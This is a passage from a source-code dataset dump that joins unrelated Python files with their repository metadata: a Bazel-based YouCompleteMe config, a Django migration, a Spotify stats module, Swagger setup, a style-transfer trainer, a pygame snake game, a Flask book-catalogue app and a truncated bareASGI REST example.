# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
"""Returns a dict containing key values from bazel info."""
bazel_info_dict = dict()
try:
out = subprocess.check_output([_BAZEL, 'info']).decode('utf-8').strip().split('\n')
except subprocess.CalledProcessError as err:
# This exit code is returned when this command is run outside of a bazel workspace.
if err.returncode == 2:
sys.exit(0)
for line in out:
key_val = line.strip().partition(": ")
bazel_info_dict[key_val[0]] = key_val[2]
return bazel_info_dict
def bazel_query(args):
"""Executes bazel query with the given args and returns the output."""
# TODO: switch to cquery when it supports siblings and less crash-y with external repos.
query_cmd = [_BAZEL, 'query'] + args
proc = subprocess.Popen(query_cmd, stdout=subprocess.PIPE)
return proc.communicate()[0].decode('utf-8')
def file_to_target(filepath):
"""Returns a string that works as a bazel target specification for the given file."""
if not filepath.startswith("external/"):
# The file path relative to repo root works for genfiles and binfiles too.
return filepath
# For external repos, we have to find the owner package manually.
repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
filepath = re.sub('external/[^/]*/', '', filepath)
# Find out which package is the owner of this file.
query_result = bazel_query(['-k', repo_prefix+'...', '--output=package'])
packages = [package.strip() for package in query_result.split('\n')]
owner = ""
for package in packages:
package = package[len(repo_prefix):]
if filepath.startswith(package) and len(package) > len(owner):
owner = package
return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
"""For file targets that are not source files, return the target that generated them.
This is needed because rdeps of generated files do not include targets that reference
their generating rules.
https://github.com/bazelbuild/bazel/issues/4949
"""
query_result = bazel_query(['--output=xml', file_target])
if not query_result:
sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
target_xml = ElementTree.fromstringlist(query_result.split('\n'))
source_element = target_xml.find('source-file')
if source_element is not None:
return file_target
generated_element = target_xml.find('generated-file')
if generated_element is not None:
return generated_element.get('generating-rule')
sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
"""Gets the file path for the generated aspects file that contains the
compile commands json entries.
"""
target_path = re.sub(':', '/', label)
target_path = re.sub('^@(.*)//', 'external/\\1/', target_path)
target_path = re.sub('^/*', '', target_path)
relative_file_path = target_path + '.compile_commands.json'
return os.path.join(bazel_bin, *relative_file_path.split('/'))
def get_compdb_json(aspects_filepath, bazel_exec_root):
"""Returns the JSON string read from the file after necessary processing."""
compdb_json_str = "[\n"
with open(aspects_filepath, 'r') as aspects_file:
compdb_json_str += aspects_file.read()
compdb_json_str += "\n]"
return re.sub('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)
def get_flags(filepath, compdb_json_str):
"""Gets the compile command flags from the compile command for the file."""
compdb_dict = json.loads(compdb_json_str)
for entry in compdb_dict:
if entry['file'] != filepath:
continue
command = entry['command']
return shlex.split(command)[1:]
# This could imply we are fetching the wrong compile_commands.json or there
# is a bug in aspects.bzl.
sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
"""Modifies flags obtained from the compile command for compilation outside of bazel."""
# We need to add the workspace directly because the files symlinked in the
# execroot during a build disappear after a different build action.
flags.extend(['-iquote', bazel_workspace])
return flags
def cfamily_settings(filename):
"""Returns C-family settings as a dict with at least a 'flags' key that
points to an array of strings as flags.
"""
bazel_info_dict = bazel_info()
bazel_bin = bazel_info_dict['bazel-bin']
bazel_genfiles = bazel_info_dict['bazel-genfiles']
bazel_exec_root = bazel_info_dict['execution_root']
bazel_workspace = bazel_info_dict['workspace']
os.chdir(bazel_workspace)
# Valid prefixes for the file, in decreasing order of specificity.
file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
if filename.startswith(p)]
if not file_prefix:
sys.exit("Not a valid file: " + filename)
filepath = os.path.relpath(filename, file_prefix[0])
file_target = standardize_file_target(file_to_target(filepath))
# File path relative to execroot, as it will appear in the compile command.
if file_prefix[0].startswith(bazel_exec_root):
filepath = os.path.relpath(filename, bazel_exec_root)
cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
.format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
if not labels:
sys.exit("No cc rules depend on this source file.")
repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
os.path.realpath(__file__))
aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
bazel_aspects = [
_BAZEL,
'build',
aspect_definition,
repository_override,
'--output_groups=compdb_files,header_files',
] + labels
proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
errors = [e for e in out.splitlines() + err.splitlines()
if e.startswith("ERROR:")]
if errors:
raise Exception('/'.join(errors))
else:
raise Exception(err)
aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
return {
'flags': flags,
'include_paths_relative_to_dir': bazel_exec_root,
}
#pylint: disable=C0103
def Settings(**kwargs):
"""Function that is called by YCM with language and filename arguments,
and expects a dict of language-specific settings.
"""
if kwargs['language'] == 'cfamily':
return cfamily_settings(kwargs['filename'])
return {}
# For testing; needs exactly one argument as path of file.
if __name__ == '__main__':
filename = os.path.abspath(sys.argv[1])
print(Settings(language='cfamily', filename=filename))
| 37.333333
| 104
| 0.694254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,894
| 0.445742
|
91fc55bd294641a3405ae46e672d73216e1f79e0
| 450
|
py
|
Python
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 10
|
2017-04-25T20:20:14.000Z
|
2021-02-26T18:57:59.000Z
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 19
|
2018-08-09T20:45:51.000Z
|
2021-11-29T17:47:21.000Z
|
djasana/migrations/0007_alter_task_completed.py
|
dosoulwork/django-asana
|
05c63cc6a375783f84bb82821800ca419db9fa85
|
[
"MIT"
] | 8
|
2018-06-28T02:54:06.000Z
|
2020-02-23T13:34:46.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djasana', '0006_adds_defaults'),
]
operations = [
migrations.AlterField(
model_name='task',
name='completed_at',
field=models.DateTimeField(null=True),
),
]
| 21.428571
| 50
| 0.615556
| 292
| 0.648889
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.266667
|
91fc8f01eba61ef1ef5ef0f60b821056938bce1a
| 6,375
|
py
|
Python
|
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | 1
|
2016-06-22T07:44:38.000Z
|
2016-06-22T07:44:38.000Z
|
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | null | null | null |
src/StatifyStats.py
|
beng92/Statify
|
9b2ef7bd7b505615f3af9cadf7ab7531a6d00bb5
|
[
"MIT"
] | null | null | null |
'''
x Total plays
x Total artists
x Total unique songs
Average song per artist
x Favourite track
Favourite artist (by plays or time)
Favourite album (req. api)
Average/total/unique plays per range
Average/total/unique artists per range
Average/total time listened per range
Favourite genre (req. api) (by plays or time)
% songs skipped before end (req. api)
Most skipped song/artist (req. api)
Graph of time of day listening
Graph of day of the week listening
Listening habits by Spotify values e.g. accousticness (req. api)
Search listening history
https://developer.spotify.com/web-api/
https://github.com/plamere/spotipy
http://spotipy.readthedocs.org/en/latest/
http://cgbystrom.com/articles/deconstructing-spotifys-builtin-http-server/
https://github.com/cgbystrom/spotify-local-http-api/issues/2
https://github.com/cgbystrom/spotify-local-http-api
http://effbot.org/zone/wcklib-calendar.htm
http://svn.python.org/projects/sandbox/trunk/ttk-gsoc/samples/ttkcalendar.py
'''
import time, datetime, StatifyCache, logging
# Songs read in order (date, Song)
class StatifyStats:
def __init__(self):
self.allSongs = []
self.allItems = []
self.firstdate = None
self.enddate = None
logging.basicConfig(filename="debug.log", filemode='w', level=logging.DEBUG, format='%(asctime)s %(levelname)s > %(message)s', datefmt='%Y/%m/%d %H:%M:%S')
self.length = 0
self.sc = StatifyCache.StatifyCache()
def most_common(self, list):
d = {}
for item in list:
if item in d:
d[item] = d[item] + 1
else:
d[item] = 1
max = 0
name = ""
for item in d:
if d[item] > max:
max = d[item]
name = item
return (name,max)
def most_common_artist_plays(self, list):
return self.most_common([s.artist for d,s in list])
def most_common_artist_link(self, artist):
song = self.sc.getName(artist, "artist")
return song.artisturl if song != None else None
def most_common_song_plays(self, list):
return self.most_common([s.name for d,s in list])
def most_common_song_link(self, song):
song = self.sc.getName(song, "song")
return song.songurl if song != None else None
def listening_time(self, list): # Expecting self.allItems in form (d,s)
timer = datetime.timedelta()
start = None
for d,s in list:
if start == None:
start = d
if s == "Spotify":
end = d
timer = timer + (d - start)
start = None
if start != None:
timer = timer + (datetime.datetime.now() - start)
return timer
def daysInRange(self, list):
startDate = list[0][0]
endDate = list[len(list)-1][0]
return (startDate - endDate).days
def load(self, start, end):
"""Loads the data.txt file created by StatifyTracking.pyw
"""
file = open("data/data.txt")
lines = file.read().splitlines()
file.close()
ret = len(lines) > self.length
self.length = len(lines)
self.allItems = []
self.firstdate = None
for line in lines:
dateLine = line.split('>',1)[0]
date = datetime.datetime.strptime(dateLine, "%a %b %d %H:%M:%S %Y")
if self.firstdate == None:
self.firstdate = date
self.enddate = date
song = line.split('>',1)[1]
index = lines.index(line)
if song != "Spotify" and song != "":
artistName = song.split(" - ",1)[0]
songName = song.split(" - ",1)[1]
songObj = self.sc.getSong(songName, artistName)
self.allItems.append((date, songObj))
elif song == "Spotify":
self.allItems.append((date,"Spotify"))
if start != None and end != None:
self.allItems = [(d,s) for d,s in self.allItems if d >= start and d <= end]
previous = ""
self.allSongs = [(d,s) for d,s in self.allItems if not isinstance(s, str)]
for item in self.allSongs:
date, song = item
#remove consecutive appearances
if song == previous:
self.allSongs.delete(item)
previous = song
return ret
def plays(self):
"""Return total number of plays for the currently loaded list
"""
return str(len(self.allSongs))
def artists(self):
"""Return number of artists in the currently loaded list
"""
return str(len(set([s.artist for d,s in self.allSongs])))
def uniquePlays(self):
"""Return the number of songs in the currently loaded list
"""
return str(len(set([s.name for d,s in self.allSongs])))
def playsPerDay(self):
"""Return the number of songs in the currently loaded list
"""
return abs(int(len(self.allSongs) / self.daysInRange(self.allSongs)))
def mcSong(self):
"""Returns the most common song, with a link to the Spotify page.
"""
name, max = self.most_common_song_plays(self.allSongs)
song = self.sc.getName(name, "song")
return (name + " - " + song.artist + " (" + str(max) + ")", self.most_common_song_link(name))
def mcArtist(self):
"""Returns the most common artist, with a link to the Spotify page.
"""
artist, max = self.most_common_artist_plays(self.allSongs)
return (artist + " (" + str(max) + ")", self.most_common_artist_link(artist))
def listenTime(self):
"""Returns the total listening time for the currently selected range.
"""
result = self.listening_time(self.allItems)
days = int(result.days)
hours = int(result.seconds/3600)
minutes = int(result.seconds/60)-(hours*60)
return str(days) + (" day, " if result.days == 1 else " days, ") + str(hours) + (" hour, " if hours == 1 else " hours, ") + str(minutes) + (" minute " if minutes == 1 else " minutes ")
return ret
| 35.814607
| 192
| 0.570824
| 5,287
| 0.829333
| 0
| 0
| 0
| 0
| 0
| 0
| 1,960
| 0.307451
|
91fd994bcee3cd09c51e7f88b4c8df6b65341586
| 861
|
py
|
Python
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 1
|
2022-03-26T20:01:55.000Z
|
2022-03-26T20:01:55.000Z
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 4
|
2022-01-23T09:22:53.000Z
|
2022-03-26T13:53:36.000Z
|
web/src/yasg.py
|
Mikhail-Gorelov/chat_microservice
|
af97a1b8bc1b8bb185b56c4a92b7b5f502ccec19
|
[
"MIT"
] | 2
|
2022-03-17T19:12:41.000Z
|
2022-03-30T09:58:50.000Z
|
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.urls import path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework import permissions
from rest_framework.authentication import SessionAuthentication
schema_view_param = {
'public': True,
'permission_classes': (permissions.IsAdminUser,),
'url': getattr(settings, 'SWAGGER_URL', None),
'authentication_classes': (SessionAuthentication,),
}
schema_view = get_schema_view(
openapi.Info(
title=settings.MICROSERVICE_TITLE + ' API',
default_version='v1',
description='Microservice description',
),
**schema_view_param,
)
urlpatterns = [
path(
'swagger/', login_required(schema_view.with_ui('swagger', cache_timeout=0)), name='schema-swagger-ui'
),
]
| 28.7
| 109
| 0.738676
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.167247
|
91fe1b9a7b1cd81006952efe0654f1a6e2066aa1
| 1,889
|
py
|
Python
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 92
|
2017-02-13T22:35:54.000Z
|
2021-04-28T09:56:02.000Z
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 4
|
2017-03-05T02:05:05.000Z
|
2019-02-23T17:15:34.000Z
|
src/train.py
|
mohamedkeid/feed-forward-style-transfer
|
f7b058d392161018b2988a24dd2f05566da5ac78
|
[
"MIT"
] | 36
|
2017-02-24T09:35:57.000Z
|
2021-05-21T17:42:03.000Z
|
#!/usr/bin/python
"""
Author: Mohamed K. Eid (mohamedkeid@gmail.com)
Description: trains a generative model for stylizing an unseen image input with a particular style
Args:
train: path to image with style to learn
"""
import argparse
import os
import tensorflow as tf
import generator
import helpers
import trainer
# Model Hyper Params
CONTENT_LAYER = 'conv3_3'
STYLE_LAYERS = {'conv1_2': .25, 'conv2_2': .25, 'conv3_3': .25, 'conv4_3': .25}
assert sum(STYLE_LAYERS.values()) == 1, "Style layer weights must up to 1"
EPOCHS = 30000
LEARNING_RATE = .001
TRAINING_DIMS = {'height': 256, 'width': 256}
RETRAIN = False
# Loss term weights
CONTENT_WEIGHT = 1.
STYLE_WEIGHT = .3
TV_WEIGHT = .1
# Default image paths
DIR_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_DIR_PATH = DIR_PATH + '/../lib/images/train2014/'
TRAINED_MODELS_PATH = DIR_PATH + '/../lib/generators/'
TRAIN_PATH = None
# Logging params and config
PRINT_TRAINING_STATUS = True
PRINT_EVERY_N = 10
helpers.config_logging()
# Parse arguments and assign them to their respective global variables
def parse_args():
global TRAIN_PATH, RETRAIN
# Create flags and assign values to their respective variables
parser = argparse.ArgumentParser()
parser.add_argument('train', help="path to image with style to learn")
parser.add_argument('--retrain', action="store_true", help="whether or not to retrain a model")
args = parser.parse_args()
TRAIN_PATH = os.path.abspath(args.train)
RETRAIN = args.retrain
parse_args()
with tf.Session() as sess:
with tf.variable_scope('generator'):
gen = generator.Generator()
t = trainer.Trainer(sess, gen, TRAIN_PATH, TRAINING_DIMS, PRINT_TRAINING_STATUS, PRINT_EVERY_N)
t.train(EPOCHS, LEARNING_RATE, CONTENT_LAYER, CONTENT_WEIGHT, STYLE_LAYERS, STYLE_WEIGHT, TV_WEIGHT, RETRAIN)
sess.close()
| 28.621212
| 117
| 0.728428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 710
| 0.37586
|
91ff58a8a89279f514514042538c466c72a92492
| 9,512
|
py
|
Python
|
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
xsnake/main.py
|
wcgbg/kids-keyboard
|
aaea8e7970407b02d46325654740859e1a7dbd83
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
MIN_MARGIN = 32
PROGRESS_BAR_HEIGHT = 8
SELF_DIR = os.path.dirname(os.path.realpath(__file__))
class Game:
def __init__(self, map_size: int, maze: bool, video_ending: bool, surface):
self._map_size = map_size
self._surface = surface
self._video_ending = video_ending
self._maze_map = maze_map.MazeMap(map_size, map_size, maze)
surface_width, surface_height = surface.get_size()
assert surface_width >= surface_height
self._grid_size = (
surface_height - MIN_MARGIN * 2 - PROGRESS_BAR_HEIGHT) // map_size
if self._grid_size % 2 == 0:
self._grid_size -= 1 # make sure self._grid_size is odd
assert self._grid_size > 0
self._left = (surface_width - map_size * self._grid_size) // 2
self._top = (surface_height -
map_size * self._grid_size) // 2 + PROGRESS_BAR_HEIGHT
self._food_imgs = self._load_food_imgs()
self._ending_img = self._load_ending_img()
self._mplayer_proc = None
self._snake_pos = [(map_size // 2, map_size // 2)] * 2
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._is_ended = False
self._ending_length = min(
self._maze_map.x_size() * 2,
self._maze_map.x_size() * self._maze_map.y_size() // 2)
self._background_songs = glob.glob(SELF_DIR + '/bgmusic/*.mp3')
assert self._background_songs
random.shuffle(self._background_songs)
self._play_background_music()
def __del__(self):
if self._mplayer_proc:
self._mplayer_proc.kill()
def _gen_food_pos(self):
while True:
food_pos = (random.randint(0,
self._maze_map.x_size() - 1),
random.randint(0,
self._maze_map.y_size() - 1))
if food_pos not in self._snake_pos:
return food_pos
def _load_food_imgs(self):
img_files = glob.glob(SELF_DIR + '/food_img/*.png')
assert img_files
imgs = []
for img_file in img_files:
imgs.append(
pygame.transform.scale(
pygame.image.load(img_file),
(self._grid_size, self._grid_size)))
return imgs
def _load_ending_img(self):
img_size = min(self._surface.get_size())
return pygame.transform.scale(
pygame.image.load(SELF_DIR + '/ending.png'), (img_size, img_size))
def _play_background_music(self):
if self._is_ended:
pygame.mixer.music.load(SELF_DIR + '/ending.mp3')
pygame.mixer.music.set_volume(1.0)
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.load(self._background_songs[0])
pygame.mixer.music.set_volume(0.4)
pygame.mixer.music.play(-1)
self._background_songs = self._background_songs[1:] + [
self._background_songs[0]
]
def update(self, direction):
if self._is_ended:
return
if direction:
assert direction in self._maze_map.directions()
if not self._maze_map.is_connected(self._snake_pos[0], direction):
return
new_head_pos = (self._snake_pos[0][0] + direction[0],
self._snake_pos[0][1] + direction[1])
if new_head_pos == self._food_pos:
self._snake_pos = [new_head_pos] + self._snake_pos
if len(self._snake_pos) >= self._ending_length:
self._is_ended = True
if self._video_ending:
pygame.mixer.music.stop()
self._mplayer_proc = subprocess.Popen(
['vlc', '-f', SELF_DIR + '/ending.mp4'])
else:
self._play_background_music()
else:
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._play_background_music()
else:
self._snake_pos = [new_head_pos] + self._snake_pos[:-1]
self._surface.fill(pygame.Color(0, 0, 0))
if self._is_ended:
surface_width, surface_height = self._surface.get_size()
assert surface_width >= surface_height
self._surface.blit(self._ending_img,
((surface_width - surface_height) // 2, 0))
else:
grid_color = pygame.Color(20, 20, 20)
wall_color = pygame.Color(255, 255, 255)
head_color = pygame.Color(100, 255, 100)
body_color = pygame.Color(80, 160, 80)
# progress bar
progress_bar_length = self._surface.get_width() * len(
self._snake_pos) // self._ending_length
self._surface.fill(
head_color,
pygame.Rect(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT))
for x in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left + x * self._grid_size, self._top),
(self._left + x * self._grid_size,
self._top + self._map_size * self._grid_size))
for y in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left, self._top + y * self._grid_size),
(self._left + self._map_size * self._grid_size,
self._top + y * self._grid_size))
for x in range(self._map_size + 1):
for y in range(self._map_size):
if x == self._map_size or not self._maze_map.is_connected(
(x, y), (-1, 0)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + x * self._grid_size,
self._top + (y + 1) * self._grid_size), 3)
for y in range(self._map_size + 1):
for x in range(self._map_size):
if y == self._map_size or not self._maze_map.is_connected(
(x, y), (0, -1)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + (x + 1) * self._grid_size,
self._top + y * self._grid_size), 3)
for i, pos in reversed(list(enumerate(self._snake_pos))):
if i == 0: # head
radius = int(self._grid_size * 0.45)
color = head_color
else:
radius = int(self._grid_size * 0.3)
color = body_color
pygame.draw.circle(
self._surface, color,
(self._left + pos[0] * self._grid_size +
self._grid_size // 2 + 1, self._top +
pos[1] * self._grid_size + self._grid_size // 2 + 1),
radius)
self._surface.blit(
self._food_img,
(self._left + self._food_pos[0] * self._grid_size,
self._top + self._food_pos[1] * self._grid_size))
pygame.display.flip()
def is_ended(self) -> bool:
return self._is_ended
def main():
parser = argparse.ArgumentParser(description='Snake')
parser.add_argument('--map_size', type=int, default=6)
parser.add_argument('--maze', action='store_true')
parser.add_argument('--video_ending', action='store_true')
args = parser.parse_args()
pygame.init()
pygame.display.set_caption("Snake")
pygame.mouse.set_visible(False)
surface = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
game = Game(args.map_size, args.maze, args.video_ending, surface)
while True:
event = pygame.event.wait()
if event.type == pygame.QUIT:
break
direction = None
if event.type == pygame.KEYDOWN:
mods = pygame.key.get_mods()
if mods & pygame.KMOD_CTRL and event.key == pygame.K_q:
break
if event.key == pygame.K_SPACE and game.is_ended():
del game
args.map_size += 1
game = Game(args.map_size, args.maze, args.video_ending,
surface)
continue
if event.key == pygame.K_LEFT:
direction = (-1, 0)
elif event.key == pygame.K_RIGHT:
direction = (1, 0)
elif event.key == pygame.K_UP:
direction = (0, -1)
elif event.key == pygame.K_DOWN:
direction = (0, 1)
game.update(direction)
pygame.quit()
if __name__ == '__main__':
main()
| 39.305785
| 80
| 0.527965
| 7,768
| 0.816653
| 0
| 0
| 0
| 0
| 0
| 0
| 264
| 0.027754
|
91ff5f7c6e601aeebe16cd2ed27293363ad42fda
| 5,342
|
py
|
Python
|
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
flaskmodel/flask_book_project.py
|
JennyHan2016/ProxyPool
|
2e65547e5d3811db32c5e79c4d70e108e0b1e934
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask, render_template, flash,request,redirect,url_for
from flask_sqlalchemy import SQLAlchemy
from flaskmodel.config import *
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
app = Flask(__name__)
# 创建数据库连接
db = SQLAlchemy(app)
'''
1. 配置数据库
a. 导入Sqlalchemy扩展
b. 创建db对象,并配置参数
c. 终端创建数据库
2. 添加书和作者模型
a. 继承db.Model
b. __tablename__:表名
c. 设置字段名
d. 设置引用关系
3. 添加数据
4. 使用模板显示数据库查询的数据
a. 在模板中for循环就行了(我自己试的时候想在py中做,但是没成功)
5. 使用WTF显示表单
a. 自定义表单类
b. 模板中显示
c. secret_key / 编码 / csrf_token的问题
6. 实现相关的增删逻辑
a. 增加数据
b. 删除书籍:网页中删除,点击需要发送数据的ID给删除书籍的路由,路由需要接收参数(for else / redirect / url_for 的使用)
c. 删除作者
'''
# 配置数据库地址
app.config['SQLALCHEMY_DATABASE_URI'] = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.secret_key = 'hbb'
# 自定义表单类
class AuthorForm(FlaskForm):
author = StringField('作者',validators=[DataRequired()])
book = StringField('书籍',validators=[DataRequired()])
submit = SubmitField('提交')
# 添加书和作者模型
class Author(db.Model):
# 表名
__tablename__ = 'authors'
# 字段
id = db.Column(db.Integer,primary_key = True)
author_name = db.Column(db.String(16),unique = True)
books = db.relationship('Book',backref='author')
# 关系引用
# books = db.relationship()
def __repr__ (self):
return '<Author: %r>' % self.author_name
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer,primary_key=True)
book_name = db.Column(db.String(255),unique=True)
author_id = db.Column(db.Integer, db.ForeignKey('authors.id'))
def __repr__ (self):
return '<Book: %r %r>' % (self.book_name,self.author_id)
#删除作者(记得把书也要删掉)
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
author = Author.query.get(author_id)
if author:
try:
Book.query.filter_by(author_id = author_id).delete()
db.session.delete(author)
db.session.commit()
except Exception as e:
flash('删除作者出错')
db.session.rollback()
else:
flash('作者找不到')
return redirect(url_for('index'))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
book = Book.query.get(book_id)
if book:
try:
db.session.delete(book)
db.session.commit()
except Exception as e:
flash('删除书籍出错')
db.session.rollback()
else:
flash('书籍找不到')
return redirect(url_for('index'))
@app.route('/',methods = ['GET','POST'])
def index():
# 创建自定义的表单
author_form = AuthorForm()
# 查询所有作者信息,让信息传递给模板
'''
验证逻辑:
1. 调用WTF的函数实现验证
2. 验证通过获取数据
3. 判断做作者是否存在
4. 如果作者存在,判断书籍是否存在,没有重复书籍就添加数据,如果重复就提示错误
5. 如果作者不存在,添加作者与书籍
6. 验证不通过就提示错误
'''
# 1. 调用WTF的函数实现验证
if author_form.validate_on_submit():
# 2. 验证通过获取数据
author_name = author_form.author.data
book_name = author_form.book.data
# 3. 判断作者是否存在
author = Author.query.filter_by(author_name=author_name).first()
book = Book.query.filter_by(book_name=book_name).first()
# 4. 如果作者存在
if author:
# 判断作者是否存在,没有重复书籍就添加数据,如果重复就提示错误
if book:
# 有同名书籍就提示
flash('已存在同名同作者书籍')
else:
# 没有同名书籍,就添加数据
try:
new_book = Book(book_name = book_name,author_id = author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('有作者时添加书籍失败')
db.session.rollback() # 如果添加失败就回滚
else:
# 如果作者不存在,判断书籍是否存在
if book:
# 有同名书籍就提示
flash('已存在相同的书籍')
else:
# 没有同名书籍就添加数据
try:
new_author = Author(author_name=author_name)
db.session.add(new_author)
db.session.commit()
new_book = Book(book_name=book_name, author_id=new_author.id)
db.session.add(new_book)
db.session.commit()
except Exception as e:
print(e)
flash('无作者时添加书籍失败')
db.session.rollback() # 如果添加失败就回滚
else:
if request.method == 'POST':
flash('参数不全!')
authors = Author.query.all()
return render_template('books.html',authors = authors,form = author_form)
if __name__ == '__main__':
# db.create_all()
# db.drop_all()
# 添加数据
# au1 = Author(author_name = 'hbb')
# au2 = Author(author_name = 'ry')
# au3 = Author(author_name = 'rmf')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(book_name = '量子史话',author_id = au1.id)
# bk2 = Book(book_name = '我们仨',author_id = au1.id)
# bk3 = Book(book_name = '管理学',author_id = au2.id)
# bk4 = Book(book_name = '玩具的学与玩',author_id = au3.id)
# bk5 = Book(book_name = '教养的迷思',author_id = au3.id)
# db.session.add_all([bk1,bk2,bk3,bk4,bk5])
# db.session.commit()
app.run(debug=True)
| 29.513812
| 137
| 0.588731
| 859
| 0.132398
| 0
| 0
| 3,480
| 0.536375
| 0
| 0
| 2,911
| 0.448674
|
91ffc327acbe66a0dfdec62b3fb9d0478e21a89a
| 1,012
|
py
|
Python
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:08:16.000Z
|
2022-02-14T09:08:16.000Z
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | 5
|
2021-03-09T22:39:17.000Z
|
2022-02-26T19:52:36.000Z
|
examples/simple_rest_nt.py
|
rob-blackbourn/bareASGI-tutorial
|
736a0e5f6e73c158101be95d0b0f456065549725
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import json
from hypercorn.asyncio import serve
from hypercorn.config import Config
from bareasgi import Application, text_reader, text_writer
import bareutils.header as header
async def get_info(scope, info, matches, content):
accept = header.find(b'accept', scope['headers'])
if accept != b'application/json':
return 500
text = json.dumps(info)
headers = [
(b'content-type', b'application/json')
]
return 200, headers, text_writer(text)
async def set_info(scope, info, matches, content):
content_type = header.find(b'content-type', scope['headers'])
if content_type != b'application/json':
return 500
